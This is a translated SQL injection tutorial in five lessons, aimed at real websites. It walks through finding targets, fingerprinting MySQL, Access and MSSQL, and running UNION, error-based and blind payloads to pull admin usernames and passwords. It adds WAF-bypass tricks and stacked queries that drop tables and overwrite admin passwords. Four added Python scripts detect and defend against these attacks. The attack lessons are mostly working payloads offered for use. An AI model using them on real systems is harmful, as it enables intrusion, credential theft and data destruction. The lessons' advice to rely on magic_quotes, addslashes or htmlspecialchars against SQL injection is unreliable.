
Lesson 1: Concepts and background knowledge

1. Concept: SQL injection is one of the web hacking techniques that is becoming more and more common today; according to statistics, about 75% of hackers use this technique to take control of a system. By injecting SQL queries/commands into input before it is passed to the web application for processing, you can log in without a username and password, get remote execution, dump data and obtain root on the SQL server. The tool used for the attack is any web browser, for example Internet Explorer, Netscape, Lynx, Firefox, ...

2. Background knowledge:
- The single quote ('): in SQL this character "wraps" a string. We usually append it after a numeric parameter in the query string to check whether an error appears. The root cause is that the data type is not checked.
- The hash (#) and the double dash (--): these mark a comment, meaning that any characters after one of them on the same line are treated as a comment and skipped when the query is executed.
- The semicolon (;): ends one query, and of course what follows it is the start of another query. Sometimes we use union to join two queries.
- Knowledge of databases (DBMS) and of the languages websites are built in (PHP, ASP):
MsAccess: usually used for small news websites, built with ASP.
MSSQL: used for large websites, built with ASP or ASPX (ASP.NET).
MySQL: any website can use it, built with PHP (MySQL and PHP are twins, they always go together).
Oracle: similar to MySQL.
DB2: used for banking websites and other systems that need a very high level of security!

Steps: Normally hacking a site with an SQL injection flaw consists of these steps:
Step 1: Check
Step 2: Order By (count the columns involved in the query that the site's URL runs)
Step 3: Union Select

a) You can search for pages that accept submitted data with any search engine on the net, for example login, search and feedback pages, or through parameters passed in the URL (dorks), e.g. chitiet.php?id=21, detail.asp?id=6, ...
b) Once you have found a target to attack, you need to determine the website's DBMS (this is an important step) by looking at the site as a whole, the language it was built in and the server OS during reconnaissance. The list above pairs the common databases with the languages websites are built in.
c) Once the target is identified, you need to test for flaws to see whether it can be attacked through them. The techniques for finding the flaw are:
- For parameters passed in the URL, e.g. index.php?id=21, index.asp?id=6, ... we simply append a single quote ('), a double quote ("), %27 or 00% after the id to test; if an error appears or nothing at all is shown (completely different from the original page), there is a 90% chance you can exploit this flaw (explained in detail later).
- For submitted data such as search, login, contact or request forms, do the same.

Example: http://ww.site.com/index.php?id=1 (assume this site has an SQL injection flaw)

Syntax / result:
http://ww.site.com/index.php?id=1'  error
http://ww.site.com/index.php?id=1"  error
http://ww.site.com/index.php?id=1%27  error
http://ww.site.com/index.php?id=1 and 1=0  error
http://ww.site.com/index.php?id=1 and 1=1  no error

Sharing some experience with you all:
1. If you check a website for SQL injection and no error shows up, don't skip it, because the admin may have hidden the error.
2. If no number appears to work with when using Union, view the page source and look there; it may be hidden inside.
3. Instead of appending ' after the id to test, you can use expressions. E.g. "and 1=1" shows the site normally, "and 1=0" shows the site with an error =>> the site is vulnerable to SQL injection. True/false expressions you can use:
2>3 ; 2<3 ; 1--1 ; BETWEEN 1 AND 3 ; 'b' BETWEEN 'a' AND 'c' ; 2 IN (0,1,2) ; CASE WHEN 1>0 THEN 1 END ; 'uuu' = 'uuu' ; ISNULL(NULL) ; ISNULL(COT(0)) ; 1 IS NOT NULL ; NULL IS NULL
If the parameter (id) of the current page is 3 and that of the next page is 2, and using 3-1 returns the content of the page with id=2, then the site is 99% certain to have an SQLi flaw.

Lesson 2

What ORDER BY is used for:
- It saves attack time.
- It is used to count the fields/columns present in the SQL query.
Syntax: order by xx (where xx is an integer; to be efficient, try order by 100 first to confirm we are on the right track)
Example: http://ww.site.com/index.php?id=1 order by 100

Errors to recognise:
Error: Unknown column '100' in 'order clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
or the site behaves strangely in some other way (based on experience).
But there are also sites where you must add a quote and -- or "-- -" or "-- a" or /* before order by works.
-- : simply put, to avoid being logged.
- : turns whatever follows it into a comment.
The common ORDER BY cases (case / syntax / example):
Case 1: order by  ->  http://ww.site.com/index.php?id=1 order by 100
Case 2: ' order by  ->  http://ww.site.com/index.php?id=1 ' order by 100
Case 3: 'order by  ->  http://ww.site.com/index.php?id=1 'order by 100
Case 4: switch to union select  ->  http://ww.site.com/index.php?id=1 union select 1
Example:
http://ww.site.com/index.php?id=1 order by 1--  no error
http://ww.site.com/index.php?id=1 order by 2--  no error
http://ww.site.com/index.php?id=1 order by 3--  no error
http://ww.site.com/index.php?id=1 order by 4--  error
So we see the vulnerable query has 3 columns (because order by 4 columns gives an error).

Lesson 3

Exploitation: After identifying an SQLi site, checking for SQLi and determining the DBMS (commonly MsAccess, MSSQL, MySQL, Oracle), we get down to exploiting it. (Each DBMS has an almost entirely different exploitation method.) You must get this clear so that exploiting the flaw is easier later. The exploitation method for each database is presented below (although, in my experience, newbies should concentrate on MySQL because it is the most common).

For the MySQL database: the returned error usually shows these signs:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
For this one, note that the first thing to do is check its current version. The technique for this one is carried out in the following order:
First we determine the number of columns in the current table using Order by n (e.g. 6).
Next we use UNION SELECT [the number of columns found, separated by commas]--
http://demo.com.vn/index.php?id=-1 Union Select 1,2,3,4,5,6--
Numbers will appear. If no numbers appear:
+ view the source
+ look at the broken image file to see the numbers
+ replace the number with null (e.g. id=-188 becomes id=null UNION ...)
+ replace the columns (fields) with null (e.g. UNION SELECT null,null,...)
+ bypass the filter (mod_security) (I will go into this case later)
+ if this message appears: The used SELECT statements have a different number of columns, then Union select like this: id=1+and+1=0+UNION SELECT+1,2...
Or use error based:
And (Select 1 From(Select Count(*),Concat(CHAR(124),(Select concat_ws(0x7c,version(),database(),user())),floor(rand(0)*2),CHAR(124))x From Information_Schema.Tables Group By x)a)--
and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--
or 1 group by concat_ws(0x7c,version(),database(),current_user,floor(rand(0)*2)) having min(0) or 1--
Or use blind:
and substring(version(),1,1)=5
Adapt them as the situation requires.

From that it shows the number 3. Our next job is to determine the version (the most important job):
http://demo.com.vn/index.php?id=-1 Union Select 1,2,version(),4,5,6--
If the returned result is:
>>>> a version greater than or equal to 4 and less than 5: exploit it like an MsAccess database flaw (guess-based hacking).
>>>> a version greater than 5: use the method below.
OK, we have determined that the version is greater than 5. We proceed to query:
http://demo.com.vn/index.php?id=-1 Union Select 1,2,table_name,4,5,6 From Information_schema.tables--
or
http://demo.com.vn/index.php?id=-1 Union Select 1,2,CONVERT(group_concat(table_name) USING latin1),4,5,6 From Information_schema.tables--
or
http://demo.com.vn/index.php?id=-1 Union Select 1,2,unhex(hex(group_concat(table_name))),4,5,6 From Information_schema.tables--
Adapt them as the situation requires. The first value it returns is CHARACTER_SETS; to combine all the tables so they are easier to search, use the Group_concat() function or limit:
http://demo.com.vn/index.php?id=-1 Union Select 1,2,group_concat(table_name),4,5,6 From Information_schema.tables--
http://demo.com.vn/index.php?id=-1 Union Select 1,2,table_name,4,5,6 From Information_schema.tables limit 17,1--
http://demo.com.vn/index.php?id=-1 Union Select 1,2,table_name,4,5,6 From Information_schema.tables limit n,1--
It lists tables like CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, USER_PRIVILEGES, VIEWS, admins. We are not very interested in the ones that are only system tables; what matters is identifying the table that holds the admin, as mentioned above. Say we find that the table holding the admin information is admins. We convert the string 'admin' to hex to make exploitation easier, e.g. converted it is ?
Then we look for the columns in the admins table with:
http://demo.com.vn/index.php?id=-1 Union Select 1,2,group_concat(column_name),4,5,6 From Information_schema.columns where table_name=(0x?)--
http://demo.com.vn/index.php?id=-1 Union Select 1,2,CONVERT(group_concat(column_name) USING latin1),4,5,6 From Information_schema.columns where table_name=(0x?)--
http://demo.com.vn/index.php?id=-1 Union Select 1,2,unhex(hex(group_concat(column_name))),4,5,6 From Information_schema.Columns where table_name=(0x?)--
After this we have identified the 2 most important columns, e.g. username and password. We then retrieve the information with:
http://demo.com.vn/index.php?id=-1 Union Select 1,2,concat(username,0x2f,password),4,5,6 From admins--
0x2f is the hex form of the character /

For the MSACCESS database: this is the hardest type to break among SQLi-vulnerable sites, not because it is secure, but because by default it opens the mdb file without admin rights, so we cannot read the msysobjects table that holds its table list. The way into this database is blind hacking (guessing). Errors returned by this type usually show these signs: Jet database, ODBC Microsoft Access Driver.
Exploitation goes like this: first use UNION SELECT 1 FROM [Table_name], where [Table_name] is the name of the table you guess holds the victim's username and password, e.g. Admin, Admins, Account, Thanhvien, Quantri, User, Users, ...
Example: you try
http://demo.com.vn/news.asp?id=72 Union select 1 from admin
and the returned error is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e37' [Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query 'admin'. Make sure it exists and that its name is spelled correctly.
(Roughly: there is no table 'admin' in the database.) Don't give up, keep guessing:
http://demo.com.vn/news.asp?id=72 Union select 1 from admins
Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match. /news.asp, line 16
(Roughly: the column counts do not match in the union query.) Now we know that the table holding the victim's information is 'admins'. At this point you just sit and count the columns in the table with Union select 1,2,3,..,n from admins, counting until it no longer reports an error and numbers appear on the page. Then you have to guess the columns holding the username and password and substitute them for the numbers that appeared; if no error appears, you guessed right. E.g. you counted up to 5 before the error went away, the numbers shown are 2 and 3, the column holding the admin login name is username and the column holding the admin password is password, so you would use:
http://demo.com.vn/news.asp?id=72 Union select 1,username,password,4,5 from admins

For the MSSQL database: errors from this one usually show these signs: Microsoft OLE DB Provider for ODBC Drivers, ODBC SQL Server Driver; for short, "OLE DB errors". Exploiting this one uses the "magic convert" technique, which is used as follows:
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
or
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('')))--sp_password
The Information_schema.tables table contains every table in the database (this is the Achilles' heel of this one).
- If you find the first table_name, say table1, check the next one:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('table1','table2',..,'table n')))--sp_password
Keep going like that until it returns the table_name holding the admin information, e.g. tbladmin, admin, user, tbuser, ...
Step 2: Get the columns. Having found the table_name holding the admin information, we get the column_name; suppose table1 holds the admin information:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='table1'))--sp_password
Say we find that the first column in table1 is username. Continue getting the second column in table1:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='table1' and column_name not in('username')))--sp_password
If we find username/password in table1, we check its password.
Step 3: Check the password. table_name is table1, the column_names in table1 are username/password:
and 1=convert(int,(select top 1 username%2b'/'%2bpassword from table1))--sp_password
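Every technique in Lesson 3 starts from the database error text that the application echoes back to the browser (the MySQL syntax error, the Jet/Access driver messages, the OLE DB and SQL Server driver strings). A site that returns a generic error page instead gives away neither the engine nor whether a query broke. The following Python script is an added check written for this page, not part of the original lessons: it scans HTTP responses for exactly the engine messages quoted above and reports which responses leak. The response bodies are constructed for the walkthrough (the MSSQL one is assumed, since the lessons quote only its driver name), and the status-based severity is the example's own rule.

```python
import re

# Signatures taken from the error messages quoted in Lesson 3, one group per engine.
# Order matters: the Access driver strings are checked before the generic OLE DB text,
# because Access errors contain both.
ERROR_SIGNATURES = [
    ("MySQL", re.compile(
        r"You have an error in your SQL syntax"
        r"|Unknown column '[^']*' in 'order clause'"
        r"|The used SELECT statements have a different number of columns")),
    ("MS Access", re.compile(r"Microsoft Jet database engine|ODBC Microsoft Access Driver")),
    ("MSSQL", re.compile(r"ODBC SQL Server Driver")),
    ("OLE DB (MSSQL or Access)", re.compile(r"Microsoft OLE DB Provider for ODBC Drivers")),
]


def scan_response(status, body):
    """Classify one HTTP response: does it expose a raw database error, and from which engine?"""
    for engine, rx in ERROR_SIGNATURES:
        m = rx.search(body)
        if m:
            # A database message inside a 200 page means the template itself prints it;
            # a 5xx carrying the message means the error handler still leaks it.
            return {"leaks": True, "engine": engine, "evidence": m.group(0),
                    "status": status, "severity": "high" if status == 200 else "medium"}
    return {"leaks": False, "engine": None, "evidence": None, "status": status, "severity": "none"}


def scan_all(responses):
    """responses: iterable of (url, status, body). Returns only the leaking ones, for a report."""
    report = []
    for url, status, body in responses:
        result = scan_response(status, body)
        if result["leaks"]:
            report.append({"url": url, **result})
    return report


# Constructed responses: the first two reuse the exact engine messages quoted in Lesson 3,
# the MSSQL body is assumed, and the last is the generic page a user should see instead.
SAMPLE_RESPONSES = [
    ("/index.php?id=1", 200,
     "<html><body>Error: Unknown column '100' in 'order clause'</body></html>"),
    ("/news.asp?id=72", 500,
     "Microsoft OLE DB Provider for ODBC Drivers error '80040e37' "
     "[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine "
     "cannot find the input table or query 'admin'."),
    ("/detail.aspx?id=6", 500,
     "Microsoft OLE DB Provider for ODBC Drivers error [Microsoft][ODBC SQL Server Driver] ..."),
    ("/index.php?id=7", 500,
     "<html><body><h1>Something went wrong</h1><p>Reference: demo-4f2a</p></body></html>"),
]

if __name__ == "__main__":
    for finding in scan_all(SAMPLE_RESPONSES):
        print(finding["url"], finding["engine"], finding["severity"], "->", finding["evidence"])
```

Run this over a crawler's or proxy's saved responses; any hit means the application's error handling should be changed to log the database message server-side and return a fixed page with a reference id, like the last sample response.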

Lesson 4

Blind SQL: Detecting a "blind SQL injection" flaw:
- For MySQL version 4 and below.
- To determine whether it has a blind SQL injection flaw, try appending a true condition. For example:
http://www.company.com/pressRelease.jsp?pressID=5 AND 1=1
If we still get back the same page as http://www.company.com/pressRelease.jsp?pressID=5, that means it is vulnerable.
Exploitation: e.g. http://www.site.com/news.php?id=5
We check the version using the string function Substring(). E.g. Substring('mmdVBF',5,3) gives 'neo'.
http://www.site.com/news.php?id=5 and substring(version(),1,1)=4
The page displays normally if the above query is true, in which case this MySQL version is 4.xxx.x; otherwise replace 4 with 5 to test again:
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
http://www.site.com/news.php?id=5 and (select 1)=1
If the site loads normally, subselects work. Next we check whether we can access mysql.user:
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
If the page loads normally we can access mysql.user, and then we can pull some passwords using the load_file() function and OUTFILE.
Checking tables and columns: this is the part where we guess:
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
(limit 0,1 makes our query return 1 row of data, so the subselect returns only 1 row; this is very important.) If the page loads normally with no content missing, the table users exists. If you get FALSE (something is missing), change the table_name until you guess right. Now we have the table name users; next we need the column name. Just like the table name, we start guessing. As I said before, try the common names for columns.
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
If the page loads normally, we know the column name is password (if we are wrong, try common names or just guess). Here we concat 1 with the password column, then return the first character (1,1).
Pulling data from the database: we found the table users with the columns username and password, so we get the characters from there:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

OK, this gets the first character of the user in the table users.

substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ASCII value, and then we compare it using the greater-than symbol >. So if the ASCII code of the character is greater than 80, the page loads normally (TRUE). We keep trying until we get FALSE.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

We get TRUE, keep incrementing:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, go higher:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!! Therefore the first character of the username is char(99). Using an ASCII converter we know that char(99) is the letter 'c'. Now let's check the second character:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that I changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

TRUE, the page loads normally, go higher:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107

FALSE, lower the number:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

TRUE, higher:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

FALSE!!!
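When a blind probe sequence like the one in Lesson 4 turns up in an incident, the responder's question is what it actually disclosed, so the right credentials can be rotated. Each request narrows one character position to a range, and the TRUE/FALSE answer is visible server-side as the response size (the "page loads normally" signal). The following Python script is an added example written for this page, not part of the original lesson: it parses the ascii(substring(...))>N probes from constructed request records, tracks the proven bounds per client, expression and position, and reports the resolved prefix. The request records, the baseline page size and the client address are assumptions of the example; the thresholds are the ones the lesson walks through, plus one unfinished third position.

```python
import re
from collections import defaultdict

# Matches the probe shape used in Lesson 4: ascii(substring(<expr>,<pos>,1))><n>
PROBE_RE = re.compile(
    r"ascii\(substring\((?P<expr>.*?),\s*(?P<pos>\d+)\s*,\s*1\)\)\s*>\s*(?P<n>\d+)", re.I)

# Constructed request records (client, decoded query string, response size in bytes); not real traffic.
# 5120 bytes is the size of the untouched page, so that size means the injected condition was TRUE.
BASELINE_BYTES = 5120
SUBQ = "(SELECT concat(username,0x3a,password) from users limit 0,1)"
SAMPLE_REQUESTS = [
    ("203.0.113.7", "id=5", 5120),
    ("203.0.113.7", f"id=5 and ascii(substring({SUBQ},1,1))>80", 5120),
    ("203.0.113.7", f"id=5 and ascii(substring({SUBQ},1,1))>95", 5120),
    ("203.0.113.7", f"id=5 and ascii(substring({SUBQ},1,1))>98", 5120),
    ("203.0.113.7", f"id=5 and ascii(substring({SUBQ},1,1))>99", 4010),
    ("203.0.113.7", f"id=5 and ascii(substring({SUBQ},2,1))>99", 5120),
    ("203.0.113.7", f"id=5 and ascii(substring({SUBQ},2,1))>107", 4010),
    ("203.0.113.7", f"id=5 and ascii(substring({SUBQ},2,1))>104", 5120),
    ("203.0.113.7", f"id=5 and ascii(substring({SUBQ},2,1))>105", 4010),
    ("203.0.113.7", f"id=5 and ascii(substring({SUBQ},3,1))>100", 5120),   # probing left unfinished
]


def parse_probe(query):
    """Return (expression, position, threshold) if the query carries a character probe, else None."""
    m = PROBE_RE.search(query)
    if not m:
        return None
    return m.group("expr").lower(), int(m.group("pos")), int(m.group("n"))


def reconstruct(requests, baseline_bytes=BASELINE_BYTES):
    """Narrow each probed position to the range the responses prove, per (client, expression)."""
    bounds = defaultdict(lambda: [0, 255])      # (client, expr, pos) -> [exclusive lower, inclusive upper]
    for client, query, size in requests:
        probe = parse_probe(query)
        if probe is None:
            continue
        expr, pos, n = probe
        lo_hi = bounds[(client, expr, pos)]
        if size == baseline_bytes:              # page unchanged: condition TRUE, so char > n
            lo_hi[0] = max(lo_hi[0], n)
        else:                                   # page changed: condition FALSE, so char <= n
            lo_hi[1] = min(lo_hi[1], n)
    results = defaultdict(dict)
    for (client, expr, pos), (lo, hi) in bounds.items():
        # The character is known only once the bounds leave exactly one code point.
        results[(client, expr)][pos] = {"range": (lo, hi), "char": chr(hi) if hi == lo + 1 else None}
    return dict(results)


def disclosed_prefix(positions):
    """Characters fully resolved from position 1 upward, stopping at the first undetermined one."""
    out = []
    for pos in sorted(positions):
        if pos != len(out) + 1 or positions[pos]["char"] is None:
            break
        out.append(positions[pos]["char"])
    return "".join(out)


def summarize(requests, baseline_bytes=BASELINE_BYTES):
    """Per (client, expression): number of probes seen and what they disclosed so far."""
    probes = defaultdict(int)
    for client, query, _ in requests:
        p = parse_probe(query)
        if p:
            probes[(client, p[0])] += 1
    summary = []
    for key, positions in reconstruct(requests, baseline_bytes).items():
        summary.append({"client": key[0], "expression": key[1], "probes": probes[key],
                        "disclosed": disclosed_prefix(positions),
                        "positions_touched": sorted(positions)})
    return summary


if __name__ == "__main__":
    for row in summarize(SAMPLE_REQUESTS):
        print(row)
```

The same bookkeeping doubles as a detector: nine requests from one client that differ only in the threshold of an ascii(substring(...)) expression have no legitimate explanation, so alert on the probe count per client long before a prefix resolves.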

Lesson 5

Filters + summary:
- When querying, some sites block the functions union, select, convert, ... and the query then returns a blank page. In that case change some letters to upper and lower case, alternating: UniON, SeLECt, ... or convert to ASCII.
- Some sites also return a blank page when querying; then look carefully at the site, including the page title. If you still see nothing, view the source and you will find it.
- Some table_name queries show nothing; then use unhex(hex(group_concat(table_name))).
- When the query returns this:
Forbidden. You don't have permission to access /news.php on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
or
Not Acceptable. An appropriate representation of the requested resource / could not be found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
then use /*! */ (e.g. /*!union*/ or /*!select*/ or information_schema./*!tables*/ etc.)
- If the query returns this:
406 Not Acceptable. This request is not acceptable. Powered By LiteSpeed Web Server. LiteSpeed Technologies is not responsible for administration and contents of this web site!
then you need to think a little. E.g. you can replace the space with %0A (the newline character), etc.

Some other queries
- Create a table:
;drop table kingnus create table thanggiangho (id int identity, kingnus varchar(99999)) insert into kingnus select table_name from information_schema.tables--sp_password

- Change the admin password: using the example above, if username: kingnus / password: ceh:
;UPDATE table1 SET password = 'ceh' WHERE username='kingnus'--
Insert a new record into the table:
;INSERT INTO 'table1' ('ID', 'username', 'password', 'details') VALUES (99,'kingnus','ceh','Online')--
Find all related tables such as admin, user, member, account, login, ...:
and 1 = convert(int,(select top 1 table_name from information_schema.tables where table_name like '%admin%' or table_name like '%Member%' or table_name like '%User%' or table_name like '%account%' or table_name like '%login%'))--sp_password
and 1 = convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('') and (table_name like '%25admin%25' or table_name like '%25Member%25' or table_name like '%25User%25' or table_name like '%25account%25' or table_name like '%25login%25')))--sp_password
- Get all table_names:
; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp%2btable_name%2b'/' from information_schema.tables select @temp as id into kingnus end--
or 1=(select id from kingnus)--
; drop table kingnus--
- Get all column_names from one table_name, e.g. table_name: tbadmin:
; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp%2bcolumn_name%2b'/' from information_schema.columns where table_name='tbadmin' select @temp as id into kingnus end--
or 1=(select id from kingnus)--

Quote:
I. How to patch the flaw:
1. Open php.ini and set magic_quotes_gpc to On. It will insert "\" before any (') found in:
- COOKIE
- POST
- GET

2. Use the addslashes() function to "wrap" the string with "/".
3. Use the functions htmlspecialchars(), mysql_escape_string(), ... to encode special characters in the query.
4. Type casting: we know that the id of an object (user, category, box, product, ...) is always an integer, so we use:
Quote:
$id = (int)$_POST['id'];
or
$id = (int)$_GET['id'];
Explanation of the fixes: the first 3 methods: if you enter abc', it is understood as one string rather than abc followed by a separate '. The 4th method: if a string is entered it is cast to the corresponding number, and a number is . . .
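Fix 4 above (casting the id to an integer) is the one that removes the whole class of id-based probes from Lessons 1 to 4, because the parameter can no longer become SQL text. The following Python script is an added example written for this page, not part of the original lessons or of any PHP code the author shows: it puts the unchecked lookup next to the hardened one on an in-memory SQLite database with constructed rows, standing in for the PHP/MySQL site. The table and column names (news, admins, username) are assumptions of the demo.

```python
import sqlite3


def build_demo_db():
    """In-memory SQLite stand-in for the site's database; every row is constructed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'First post'), (2, 'Second post');
        CREATE TABLE admins (username TEXT, password TEXT);
        INSERT INTO admins VALUES ('admin', 'demo-hash-not-real');
    """)
    return db


def news_title_vulnerable(db, raw_id):
    """The flaw the lessons rely on: the raw parameter is pasted into the SQL text."""
    try:
        return [row[0] for row in db.execute("SELECT title FROM news WHERE id=" + raw_id)]
    except sqlite3.OperationalError:
        return None          # stands in for the database error page the lessons look for


def news_title_hardened(db, raw_id):
    """Fix 4 (cast to int) plus a bound parameter, so the value can never become SQL."""
    try:
        news_id = int(raw_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    return [row[0] for row in db.execute("SELECT title FROM news WHERE id=?", (news_id,))]


def rejects(fn, db, raw_id):
    """True if the lookup refuses the value with ValueError instead of running it."""
    try:
        fn(db, raw_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    for value in ["1", "1'", "1 and 1=0", "-1 union select username from admins"]:
        print(repr(value), "unchecked:", news_title_vulnerable(db, value),
              "| hardened rejects:", rejects(news_title_hardened, db, value))
```

Two details differ from the PHP cast the lesson shows: PHP's (int)"1 and 1=1" silently yields 1, whereas int() here rejects the value outright, which is the better choice for logging and alerting; and the bound parameter in the query covers string columns too, where a numeric cast does not apply and fixes 1 to 3 rely on escaping alone.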

Guide to bypassing some common errors:

Type 403, 406: order by succeeds, but union select produces messages like these:
Quote:
406 Not Acceptable. This request is not acceptable. Powered By LiteSpeed Web Server. LiteSpeed Technologies is not responsible for administration and contents of this web site!
Quote:
Forbidden. You don't have permission to access /htmls/recruitment_detail.php on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.vinaplast.com.vn Port 80
Quote:
Not Acceptable. An appropriate representation of the requested resource /detClientes.php could not be found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

To get past this we need to bypass it; if the bypass works, consider the site 90% done. Here are some ways to get past it:
Method 1: customise union select. Customising means adjusting UPPER case, lower case, and alternating UPPER and lower case.
Method 2: add comments /*!...*/ , /*!50000...*/
Method 3: use URL encoding, like this: for example we encode union, but only encode some or all of the letters in union. Just convert it to hex and put % in front; note that it is %, not 0x.
Method 4: when a space causes an error, replace the space with +, and in some cases with %0A, %0B, %0C, %0D, %09, %20, ...
Method 5: combine the 4 methods above.
Method 6: make up your own.
A trick for finding the keyword that mod_security blocks: once the union select bypass succeeds, you reach the get table_name stage. At that stage you will surely hit an obstacle because it keeps reporting an error, so the way past it is as follows. Example: site.com?tghmmd=1 order by 7-- - is ok, and the bypassed Union select shows the number 3.
Quote:
>>union select 1,2,3,4,5,6,7--
+ Get table_name: don't rush to put the table_name in; first add "from information_schema.tables" >> it becomes
Quote:
union select 1,2,3,4,5,6,7 from information_schema.tables--
If it reports an error, the bypass is usually: replace tables with /*!tables*/ or /*!50000tables*/, or from with /*!from*/ or /*!50000from*/.
If it does not report an error we go on and add where table_schema=database()
- If it reports an error again, bypass as follows: replace where with /*!where*/ or /*!50000where*/, or = with like.
Note here: database(); when you looked for version() and it blocked (), use the database's name here instead.
>> Once that is added, if the number 3 still shows in the column position, the bypass is OK. Now just put the table_name in place of 3. If it errors, continue bypassing as above: table_name = /*!table_name*/ = /*!50000table_name*/
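The bypass list in Lesson 5 and this section (mixed case, /*!...*/ and /*!50000...*/ comments, partial URL encoding, %0A/%09/+ in place of spaces) is, read from the other side, a list of the transformations a filter or log detector must undo before it matches anything. The following Python script is an added example written for this page, not part of the original lessons: it folds those evasions into one canonical form and only then applies the keyword signatures, so that the variants the text says get past a naive filter are all caught and a benign word containing "union" is not. The sample values are constructed for the walkthrough.

```python
import re
from urllib.parse import unquote_plus

# Constructed inputs exercising the evasions listed above; the last two are benign.
SAMPLE_VALUES = [
    "1 UniON SeLECt 1,2,3--",
    "1 /*!union*/ /*!50000select*/ 1,2,3--",
    "1%0A%75nion%0Bselect%0C1,2,3--",
    "1+union/**/select+1,2,3+from+information_schema./*!tables*/--",
    "1 union%20all%20select 1,2,3",
    "42",
    "reunion tickets",
]

# MySQL version comments (/*!50000...*/) keep their contents; ordinary /*...*/ is dropped.
COMMENT_RE = re.compile(r"/\*!\d{0,5}|/\*.*?\*/|\*/", re.S)
UNION_RE = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")
SCHEMA_RE = re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b")


def normalize(value):
    """Fold the evasions above into one canonical lowercase form before matching."""
    v = unquote_plus(value)                      # %75 -> u, %0A -> newline, + -> space
    v = COMMENT_RE.sub(" ", v)                   # /*!50000select*/ -> select, /**/ -> space
    v = re.sub(r"\s+", " ", v).strip().lower()   # newline, tab and form-feed variants become one space
    return v


def classify(value):
    """Tags for one raw parameter value, computed on its normalized form."""
    v = normalize(value)
    tags = []
    if UNION_RE.search(v):
        tags.append("union_select")
    if SCHEMA_RE.search(v):
        tags.append("information_schema")
    return tags


def triage(values):
    """[(raw value, tags)] for a batch of parameter values."""
    return [(raw, classify(raw)) for raw in values]


if __name__ == "__main__":
    for raw, tags in triage(SAMPLE_VALUES):
        print(f"{raw!r:70} -> {normalize(raw)!r:40} {tags}")
```

Decode once and normalize before matching, never after; a filter that matches on the raw value is exactly what the six methods above are written to get around, and the 403/406 responses quoted in this section are what such a filter looks like from the outside.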
